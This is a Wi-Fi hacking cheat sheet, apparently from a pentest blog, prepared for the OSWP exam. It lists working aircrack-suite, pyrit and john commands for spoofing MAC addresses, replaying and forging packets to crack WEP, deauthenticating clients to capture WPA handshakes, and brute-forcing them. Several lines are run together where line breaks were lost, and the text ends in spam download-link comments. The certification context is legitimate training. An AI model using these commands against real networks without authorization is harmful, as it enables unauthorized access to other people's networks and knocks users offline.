This command list served as a cheat sheet for the Offensive Security Wireless
Professional exam and shows the usage of the most common attack tools.
If you want to keep your Network Manager running you can blacklist the MAC addresses of the interfaces which shall be ignored.
The major flaw of the wep encryption lies in the possibility of a statistical attack based on weak initialization vectors. So the standard procedure consists of starting to dump the traffic, enforcing a lot of data packets and cracking the capture file.
WPA encrypted networks are regarded as secure and the only known attack is to brute force the 4-way handshake.
As with managing wireless networks from the command line the script qw can be used to simplify sniffing and capturing of wpa handshakes.
Preparation
show and stop interfering processes
systemctl stop NetworkManager
airmon-ng check [kill]change MAC address
macchanger -m 00:11:22:33:44:55 wlan0toggle monitor mode
airmon-ng start wlan0
airmon-ng stop wlan0moncard to card injection test
With two wireless interfaces in monitoring mode you can test which explicit attacks are supported.aireplay-ng -9 -i wlan1mon wlan0monprevent Network Manager from managing devices
If you want to keep your Network Manager running you can blacklist the MAC addresses of the interfaces which shall be ignored.
/etc/NetworkManager/NetworkManager.conf
...
[keyfile]
unmanaged-devices=mac:00:11:22:33:44:55
...traffic capture
capture traffic( 2.4 and 5GHz)
airodump-ng --band abg --manufacturer wlan0monshow manufacturer information
airodump-ng-oui-update
airodump-ng --manufacturer wlan0monattacking wep
The major flaw of the wep encryption lies in the possibility of a statistical attack based on weak initialization vectors. So the standard procedure consists of starting to dump the traffic, enforcing a lot of data packets and cracking the capture file.
collect ivs
airodump-ng -c 1 -w wep_file --ivs wlan0monopen system authentication
aireplay-ng -1 60 -a <AP_MAC> -h <source_MAC> wlan0monshared key authentication
aireplay-ng -1 60 -y <xor_file> -a <AP_MAC> -h <source_MAC> wlan0monarp replay attack
aireplay-ng -3 -b <AP_MAC> -h <source_MAC> wlan0monchopchop attack
aireplay-ng -4 -b <AP_MAC> -h <source_MAC> wlan0monfragmentation attack
aireplay-ng -5 -b <AP_MAC> -h <source_MAC> wlan0moncreate ARP packet
packetforge-ng -0 -a <AP_MAC> -h <source_MAC> -l 255.255.255.255 -k 255.255.255.255 -y <xor_file> -w arp.capinject packet
aireplay-ng -2 -r arp.cap wlan0moncrack the wep key
aircrack-ng wep_file.ivsattacking wpa
WPA encrypted networks are regarded as secure and the only known attack is to brute force the 4-way handshake.
capture handshake
airodump-ng -c 1 -w wpa_file wlan0mondeauthenticate client
aireplay-ng -0 1 -a <AP_MAC> -c <client_MAC> wlan0monstrip unneeded packets
pyrit -r wpa_file.cap -o wpa_file_strip.cap stripwordlist attack
aircrack-ng -w wordlist.txt wpa_file_strip.cap
pyrit -i wordlist.txt -r wpa_file_strip.cap attack_passthroughbrute force attack
john --incremental --stdout | aircrack-ng -w - wpa_file_strip.capprecomputed pmk attack
pyrit -i wordlist.txt import_passwords
pyrit -e <essid> create_essid
pyrit batch
pyrit -r wpa_file_strip.cap attack_dbspeed up with qw
As with managing wireless networks from the command line the script qw can be used to simplify sniffing and capturing of wpa handshakes.
capture handshake
qw s -c 1 -f wpa_file
qw d <bssid>
Pen Test Diary: Wireless Hacking Wifu >>>>> Download Now
BalasHapus>>>>> Download Full
Pen Test Diary: Wireless Hacking Wifu >>>>> Download LINK
>>>>> Download Now
Pen Test Diary: Wireless Hacking Wifu >>>>> Download Full
>>>>> Download LINK Pw